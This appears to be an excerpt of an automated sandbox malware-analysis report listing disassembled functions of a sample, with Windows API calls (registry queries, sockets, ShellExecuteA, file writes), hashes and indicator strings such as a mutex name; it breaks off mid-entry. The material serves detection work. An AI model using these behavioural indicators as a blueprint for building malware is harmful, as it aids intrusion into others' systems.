                                                                                                            • Opcode ID: 603f0c10bb76561038a6ceb62e5b39093bb83f99c02a33dd9f15b9b53b9dfe29
                                                                                                            • Instruction ID: ba4487c3d588aef9642ebe16e80dfb321deb8f04a62dad36387b707430fcf7c0
                                                                                                            • Opcode Fuzzy Hash: 603f0c10bb76561038a6ceb62e5b39093bb83f99c02a33dd9f15b9b53b9dfe29
                                                                                                            • Instruction Fuzzy Hash: EC31E9B190426CDFDF60CF64CC987EABBB4BB55305F1041DAD68DAA290DBB55AC48F80
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 008F5AF0
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 008F5B2D
                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 008F5BFB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValuewsprintf
                                                                                                            • String ID: %c%d_%d$joneC:\Windows\
                                                                                                            • API String ID: 2691868063-3632261859
                                                                                                            • Opcode ID: 4794e4f502a643fd6615518fa9bd5984df1342f2787ad0f4867721dc78395c96
                                                                                                            • Instruction ID: c4c8a534ce2123ca050694ac5179f6c33c56f3df8dbed9998d24979638d3fe5e
                                                                                                            • Opcode Fuzzy Hash: 4794e4f502a643fd6615518fa9bd5984df1342f2787ad0f4867721dc78395c96
                                                                                                            • Instruction Fuzzy Hash: 5911F67090162CEBDB24CFA4DC88BE9B3B4FB48318F2442C9D20AA6290D7749BC5DF54
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __common_dcos_data_controlfpexit
                                                                                                            • String ID: xK@
                                                                                                            • API String ID: 3450241358-3237099428
                                                                                                            • Opcode ID: 047b8998b6011b208613e5082c8329296d02a9e0103927ce644c1c8cee99fc08
                                                                                                            • Instruction ID: 633c6900e10d85b952713bc18b4489e817c94b141a67359fbbed4e1ea560f53d
                                                                                                            • Opcode Fuzzy Hash: 047b8998b6011b208613e5082c8329296d02a9e0103927ce644c1c8cee99fc08
                                                                                                            • Instruction Fuzzy Hash: 87F0B6F6D00108ABDB40E6E9CD46B8F76BC9B48304F100476B615F3281E639EA0487A5
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 008F5AF0
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 008F5B2D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValuewsprintf
                                                                                                            • String ID: %c%d_%d$joneC:\Windows\
                                                                                                            • API String ID: 2072284396-3632261859
                                                                                                            • Opcode ID: 22842dc841e2fa60b763a1b0fcddf0e0c3af6b71953fffdd7f990f4ddc7ce6e0
                                                                                                            • Instruction ID: d07b8539e0b854058d4ab5f20ee6d8d6619709edc8d6407cd488f2a190945bdd
                                                                                                            • Opcode Fuzzy Hash: 22842dc841e2fa60b763a1b0fcddf0e0c3af6b71953fffdd7f990f4ddc7ce6e0
                                                                                                            • Instruction Fuzzy Hash: 4F01DEB595112CEBDB24CFA5DC88BE9B3B4FB58304F2042C9E209A6250D7749BC5DF54
                                                                                                            APIs
                                                                                                            • htons.WS2_32(?), ref: 008F8317
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • GetTickCount.KERNEL32 ref: 008F834E
                                                                                                              • Part of subcall function 008F7C4E: socket.WS2_32(00000002,00000001,00000006), ref: 008F7C83
                                                                                                            • send.WS2_32(00000000,00000000,00000008,00000000), ref: 008F8389
                                                                                                              • Part of subcall function 008F811C: GlobalAlloc.KERNEL32(00000040,-00000C00,?,?,?,?), ref: 008F81A1
                                                                                                              • Part of subcall function 008F811C: recv.WS2_32(00000000,00000008,00000400,00000000), ref: 008F81F0
                                                                                                              • Part of subcall function 008F811C: GlobalFree.KERNEL32(00000000), ref: 008F8247
                                                                                                              • Part of subcall function 008F811C: closesocket.WS2_32(000000FF), ref: 008F8283
                                                                                                            • closesocket.WS2_32(000000FF), ref: 008F83BE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Globalclosesocket$AllocCountExchangeFreeInterlockedTickhtonsrecvsendsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1332007968-0
                                                                                                            • Opcode ID: fbba224e10e4b62ebe950106d1e5af42fd75d495637597e56295ca8425f06dba
                                                                                                            • Instruction ID: 889e49a21f7e135a9a36dc65b3d1d88dc5ac90e6e78a69466977e9e62fdb251f
                                                                                                            • Opcode Fuzzy Hash: fbba224e10e4b62ebe950106d1e5af42fd75d495637597e56295ca8425f06dba
                                                                                                            • Instruction Fuzzy Hash: 44217F71D012289AEF60DB78CC0ABADB7B4FF44300F0446A9E30DE62D2EB744A959F51
                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 008F45E3
                                                                                                            • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000020,00000000), ref: 008F45FC
                                                                                                            • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 008F461D
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 008F4627
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateDeleteHandleWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 656945655-0
                                                                                                            • Opcode ID: e73568831fb142da548600f0b7ed5c1b42b32fc0568239302f8b86b92a019afd
                                                                                                            • Instruction ID: 985dc8304132fa01918c2a5cfba8be4dbb2eb674fb74d8360cf37c33ef7099b3
                                                                                                            • Opcode Fuzzy Hash: e73568831fb142da548600f0b7ed5c1b42b32fc0568239302f8b86b92a019afd
                                                                                                            • Instruction Fuzzy Hash: E1F0E779641308FBEF10DFA4DC4DF9E7B78AB48711F508645FB05AB2D0D674AA448BA0
                                                                                                            APIs
                                                                                                            • select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 008F80DA
                                                                                                            • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 008F80F5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: recvselect
                                                                                                            • String ID: @
                                                                                                            • API String ID: 741273618-2766056989
                                                                                                            • Opcode ID: 69eafbf400bfa1249c6a5ac8e91890ae99135be97f86d3847c3b47af1ce91b06
                                                                                                            • Instruction ID: 4f8a0f487c2d3c2ef445b04ff4531bf253798c0cecabe5fe30e6fdde9b4f8de4
                                                                                                            • Opcode Fuzzy Hash: 69eafbf400bfa1249c6a5ac8e91890ae99135be97f86d3847c3b47af1ce91b06
                                                                                                            • Instruction Fuzzy Hash: 1441E770A0421CDBEB68CF54C891BE9B7B5FF94304F108199E609A6280DFB56EC48F91
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 008F5153
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 008F518F
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000400), ref: 008F51D1
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008F543A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue$Closewsprintf
                                                                                                            • String ID: joneC:\Windows\
                                                                                                            • API String ID: 3301640424-2213015650
                                                                                                            • Opcode ID: 447494624bc029406770ae0887212bee2760cd70d493b9e9005808f1eb447eb0
                                                                                                            • Instruction ID: 0d5edb781452668edd4e204f1703352a4e354f137a32fb8157ac42fb40705003
                                                                                                            • Opcode Fuzzy Hash: 447494624bc029406770ae0887212bee2760cd70d493b9e9005808f1eb447eb0
                                                                                                            • Instruction Fuzzy Hash: 62F0E7719121289BDB20DB60DD84BEAF378FB54705F0852D9A729A6140C732AB98DF54
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000023.00000002.4178379920.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_35_2_7f0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 0-162185446
                                                                                                            • Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction ID: d2191262b13b19fff7454ae18d8aabd0476e1db9aac594bbc95952f01509cb6c
                                                                                                            • Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction Fuzzy Hash: DF613E7164028CEBEF11DF60CC49FAA3768FB04701F544515EE09BE3E2D6B55A448BAA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000023.00000002.4178379920.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_35_2_7f0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: 11f47da716561d2096711fe3526464a5c587c868d7252386184446dedc58397a
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: B9B12C75A0028D8FEF10DF14CD44BA937A5FF44304F484965DD09AF3A2D379AA94CB9A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000023.00000002.4178379920.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_35_2_7f0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: b42a2f5b0ae3a4c38c3da36e37a71cef30f60babda9e447160652bb387786a32
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: 5711DB7124428DABEF10DEA08D4DFED37A8AF84B05F444415BA09FE2E1DAB59640877E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000024.00000002.4186738020.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_36_2_c90000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 0-162185446
                                                                                                            • Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction ID: b402ca5e5e001f2d375250d6809631e199c7655ff3a1179eb084ebd5b65d4433
                                                                                                            • Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction Fuzzy Hash: 53614F71640288AFEF10DF60CC4DFAA3768EF04B05F640515EE19BE1F1D6B1AA449B5E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000024.00000002.4186738020.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_36_2_c90000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: fb56a7527caaf12563075fab71d83344ac5bd42aa8249c8b9c7095e5f57864ed
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: E4B15931A002898FEF10CF64CC48BA937A5FF54314F694825DC1DAF2A1D775AB94DB8A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000024.00000002.4186738020.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_36_2_c90000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: 58b5a0400c8505086555b76d80215247e82b6d4521dfdd6a9a73287f2809a176
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: FF11DB71244689AFEF10DFA08D4DFE937A9AB84B05F544415BA09FE0E0DAB19740876E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000025.00000002.4200924130.0000000001290000.00000040.00000001.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_37_2_1290000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 0-162185446
                                                                                                            • Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction ID: 5e70be7e9da449a56b6e67ad23130937de59dc5ca2fdd08e871b99ec01bce805
                                                                                                            • Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction Fuzzy Hash: 20614D7165028DABEF11DFA8CC49FAA376CEF04B05F440515FE09BE1E0D6B1A6448B6E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000025.00000002.4200924130.0000000001290000.00000040.00000001.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_37_2_1290000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: bcec666756b16cb791e1dce934acb681a0a50c460a929a195bdcd5370a911316
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: ADB12C71A1018E8FEF15CF18CC44BA937A9FF44314F484925EE09AF2A1D375AA94CB4E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000025.00000002.4200924130.0000000001290000.00000040.00000001.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_37_2_1290000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: aaaca7f6e4b603e87f92829ab5da22ad6742bedf69e509a9e6d97b06c5afa13e
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: 42111B71650289ABEF11DEA88D4DFED37ACAB84B01F440415BB09FE0E0DAB19200872E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000026.00000002.4199006634.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_38_2_f60000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 0-162185446
                                                                                                            • Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction ID: c0c1625fb972d78676509f8ec7fbafdc677bb8920868b6c6e5c8cf15cc7185d2
                                                                                                            • Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction Fuzzy Hash: 18618171640288ABEF10DF60CC49FEB3768EF05711F640515FE09BE1E1DAB156449B5E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000026.00000002.4199006634.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_38_2_f60000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: e2c79bb9501d0788d93122cb9c453c413aa447e8d1bf1422ef3893417cd7bbb2
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: 09B15D35A002898FEF10CF64CC44BAA37A5FF44314F684925DC0DAF2A1DB75AA94DF4A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000026.00000002.4199006634.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_38_2_f60000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: 85b9b3c7cf16878999bb9c3410d87ab1a55961ab8762ba7f9a61741f436543a7
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: F3112D31640288ABEF11DEA08D5DFEE37A8AF94B01F540415FA09FE0E0DAB19600972F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000027.00000002.4186189848.0000000000DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_39_2_da0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 0-162185446
                                                                                                            • Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction ID: ffd0a290d01c54f37b6e731d7db502d5f7bb1ec03adc87292bd531120861317b
                                                                                                            • Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction Fuzzy Hash: B7615071640388ABEF10DF60CC49FEA3B68EF06705F544515EE49BE1E0D7B1A6448B6E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000027.00000002.4186189848.0000000000DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_39_2_da0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: cf9986b4c54e8e42be83201b279c06c92ffa2faaeadf48186a354cec698e7590
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: 75B13975A002898FEF10CF24CC44BA93BA5FF45304F4C4925DD49AF2A1D375AA95CFAA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000027.00000002.4186189848.0000000000DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_39_2_da0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: 2d333d3777cdb153510c282c3599c34410d0fe11d704f13891f7bd2cf8efc2c0
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: CF11ED71244389ABEF10DEA08D4DFE937A8AF85B05F484415FA09FE0E0DAB59640877F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000028.00000002.4182558170.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_40_2_7d0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 0-162185446
                                                                                                            • Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction ID: 38b85e9eb659ef02ffc2b7647941bd92a6d74d7ffe0409de7d76ad55ec40bcd2
